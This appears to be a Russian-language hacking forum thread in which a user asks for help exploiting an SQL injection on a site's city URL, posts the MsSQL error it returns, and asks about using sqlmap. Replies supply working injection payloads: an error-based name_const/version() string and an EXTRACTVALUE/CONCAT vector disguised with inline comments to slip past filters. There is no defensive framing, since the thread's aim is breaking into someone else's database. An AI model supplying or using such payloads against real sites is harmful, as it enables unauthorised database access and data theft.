![]() |
Помогите расскрутить sql
Вид такой: site.com/city/1' Все перелазил ничего не нашел! Код ошибки 1)Throwable_SQL_Exception [ 0 ]: Message: Failed to query SQL statement. Reason: Incorrect syntax near 'id' and Draft = 0'. Код:
MODPATH/leap/classes/Base/DB/MsSQL/DataReader/Standard.php [ 48 ] |
Error dased
|
Цитата:
site.com/city/1' - не могу понять как сделать правельную sql типо .php?city=1' |
site.com/city/1'or(select*from(select(name_const(version(),1)),na me_const(version(),1))a)and(1)='1
|
Цитата:
А можно в sqlmap какнибудь раскрутить? |
Есть ещё один прекрасный вектор, который может сработать в твоей ситуации.
Код:
site.com/city/-1+/*!aNd*/+/*!ExTRaCtVaLuE*/(1,/*!CoNcAt*/(0x3a,(version()))+--+ |
Цитата:
А можно в sqlmap какнибудь раскрутить? Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
| Время: 04:38 |